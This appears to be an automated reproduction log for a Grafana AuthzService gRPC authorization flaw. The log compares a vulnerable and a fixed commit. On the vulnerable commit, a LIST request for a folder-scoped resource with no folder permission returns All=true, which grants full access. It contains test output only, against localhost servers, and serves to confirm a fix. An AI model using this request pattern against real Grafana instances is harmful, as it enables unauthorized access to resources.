=== Grafana authz gRPC boundary reproduction === Root: /data/pruva/runs/a0182fdc-0c15-4d3c-b6ae-d04e7ee50d69/bundle UTC time: 2026-07-04T19:20:40Z Using repo path: /data/pruva/project-cache/6c6f6fd2-6e61-4267-8db1-032ee6a303f9/repo Go version: go version go1.26.4 linux/amd64 Reusing existing git checkout at /data/pruva/project-cache/6c6f6fd2-6e61-4267-8db1-032ee6a303f9/repo Fixed commit: b9b897b3c512ee434341bb9d698eac24f90eca89 Vulnerable commit: 27750f0e0e3443c39f992bfe22efe3d352ee4357 Patch check: vulnerable parent lacks listPermissionWithFolderAuthz fork; fixed commit contains it === VULNERABLE attempt 1: checkout 27750f0e0e3443c39f992bfe22efe3d352ee4357 === HEAD is now at 27750f0e0e3 Variables: Remove refactorVariablesTimeRange feature flag (#126773) VULNERABLE attempt 1: go test exited 0 VULNERABLE attempt 1 result: All=true VULNERABLE attempt 1 request/response evidence: repro_grpc_boundary_test.go:57: SETUP: mapper.Get("widget.ext.grafana.app","widgets","") found=false (false means folder-scoped CRD mapper miss) repro_grpc_boundary_test.go:102: SERVER: Grafana AuthzService gRPC endpoint listening on 127.0.0.1:39885 repro_grpc_boundary_test.go:115: HEALTHCHECK: TCP connection to Grafana AuthzService endpoint 127.0.0.1:39885 succeeded repro_grpc_boundary_test.go:132: CLIENT: sending LIST over gRPC /authz.v1.AuthzService/List namespace=org-12 subject=user:test-uid group=widget.ext.grafana.app resource=widgets verb=list permission=widget.ext.grafana.app/widgets:get scope=* no_folder_permission=true repro_grpc_boundary_test.go:80: SERVER: accepted gRPC method=/authz.v1.AuthzService/List namespace=org-12 subject=user:test-uid group=widget.ext.grafana.app resource=widgets verb=list token_prefix=pruva repro_grpc_boundary_test.go:91: SERVER: completed gRPC method=/authz.v1.AuthzService/List response All=true Folders=[] Items=[] err= repro_grpc_boundary_test.go:135: CLIENT: received ListResponse: All=true Folders=[] Items=[] === VULNERABLE attempt 2: checkout 27750f0e0e3443c39f992bfe22efe3d352ee4357 === HEAD is now at 27750f0e0e3 Variables: Remove refactorVariablesTimeRange feature flag (#126773) VULNERABLE attempt 2: go test exited 0 VULNERABLE attempt 2 result: All=true VULNERABLE attempt 2 request/response evidence: repro_grpc_boundary_test.go:57: SETUP: mapper.Get("widget.ext.grafana.app","widgets","") found=false (false means folder-scoped CRD mapper miss) repro_grpc_boundary_test.go:102: SERVER: Grafana AuthzService gRPC endpoint listening on 127.0.0.1:43345 repro_grpc_boundary_test.go:115: HEALTHCHECK: TCP connection to Grafana AuthzService endpoint 127.0.0.1:43345 succeeded repro_grpc_boundary_test.go:132: CLIENT: sending LIST over gRPC /authz.v1.AuthzService/List namespace=org-12 subject=user:test-uid group=widget.ext.grafana.app resource=widgets verb=list permission=widget.ext.grafana.app/widgets:get scope=* no_folder_permission=true repro_grpc_boundary_test.go:80: SERVER: accepted gRPC method=/authz.v1.AuthzService/List namespace=org-12 subject=user:test-uid group=widget.ext.grafana.app resource=widgets verb=list token_prefix=pruva repro_grpc_boundary_test.go:91: SERVER: completed gRPC method=/authz.v1.AuthzService/List response All=true Folders=[] Items=[] err= repro_grpc_boundary_test.go:135: CLIENT: received ListResponse: All=true Folders=[] Items=[] === FIXED attempt 1: checkout b9b897b3c512ee434341bb9d698eac24f90eca89 === Previous HEAD position was 27750f0e0e3 Variables: Remove refactorVariablesTimeRange feature flag (#126773) HEAD is now at b9b897b3c51 IAM: folder-scoped authz with LIST (#126931) FIXED attempt 1: go test exited 0 FIXED attempt 1 result: All=false FIXED attempt 1 request/response evidence: repro_grpc_boundary_test.go:57: SETUP: mapper.Get("widget.ext.grafana.app","widgets","") found=false (false means folder-scoped CRD mapper miss) repro_grpc_boundary_test.go:102: SERVER: Grafana AuthzService gRPC endpoint listening on 127.0.0.1:43707 repro_grpc_boundary_test.go:115: HEALTHCHECK: TCP connection to Grafana AuthzService endpoint 127.0.0.1:43707 succeeded repro_grpc_boundary_test.go:132: CLIENT: sending LIST over gRPC /authz.v1.AuthzService/List namespace=org-12 subject=user:test-uid group=widget.ext.grafana.app resource=widgets verb=list permission=widget.ext.grafana.app/widgets:get scope=* no_folder_permission=true repro_grpc_boundary_test.go:80: SERVER: accepted gRPC method=/authz.v1.AuthzService/List namespace=org-12 subject=user:test-uid group=widget.ext.grafana.app resource=widgets verb=list token_prefix=pruva repro_grpc_boundary_test.go:91: SERVER: completed gRPC method=/authz.v1.AuthzService/List response All=false Folders=[] Items=[] err= repro_grpc_boundary_test.go:135: CLIENT: received ListResponse: All=false Folders=[] Items=[] === FIXED attempt 2: checkout b9b897b3c512ee434341bb9d698eac24f90eca89 === HEAD is now at b9b897b3c51 IAM: folder-scoped authz with LIST (#126931) FIXED attempt 2: go test exited 0 FIXED attempt 2 result: All=false FIXED attempt 2 request/response evidence: repro_grpc_boundary_test.go:57: SETUP: mapper.Get("widget.ext.grafana.app","widgets","") found=false (false means folder-scoped CRD mapper miss) repro_grpc_boundary_test.go:102: SERVER: Grafana AuthzService gRPC endpoint listening on 127.0.0.1:40759 repro_grpc_boundary_test.go:115: HEALTHCHECK: TCP connection to Grafana AuthzService endpoint 127.0.0.1:40759 succeeded repro_grpc_boundary_test.go:132: CLIENT: sending LIST over gRPC /authz.v1.AuthzService/List namespace=org-12 subject=user:test-uid group=widget.ext.grafana.app resource=widgets verb=list permission=widget.ext.grafana.app/widgets:get scope=* no_folder_permission=true repro_grpc_boundary_test.go:80: SERVER: accepted gRPC method=/authz.v1.AuthzService/List namespace=org-12 subject=user:test-uid group=widget.ext.grafana.app resource=widgets verb=list token_prefix=pruva repro_grpc_boundary_test.go:91: SERVER: completed gRPC method=/authz.v1.AuthzService/List response All=false Folders=[] Items=[] err= repro_grpc_boundary_test.go:135: CLIENT: received ListResponse: All=false Folders=[] Items=[] Previous HEAD position was b9b897b3c51 IAM: folder-scoped authz with LIST (#126931) HEAD is now at 27750f0e0e3 Variables: Remove refactorVariablesTimeRange feature flag (#126773) === Summary === Vulnerable attempt 1 (27750f0e0e3443c39f992bfe22efe3d352ee4357): All=true Vulnerable attempt 2 (27750f0e0e3443c39f992bfe22efe3d352ee4357): All=true Fixed attempt 1 (b9b897b3c512ee434341bb9d698eac24f90eca89): All=false Fixed attempt 2 (b9b897b3c512ee434341bb9d698eac24f90eca89): All=false CONFIRMED: vulnerable Grafana AuthzService gRPC LIST returns All=true across the remote API boundary, while the fixed commit returns All=false.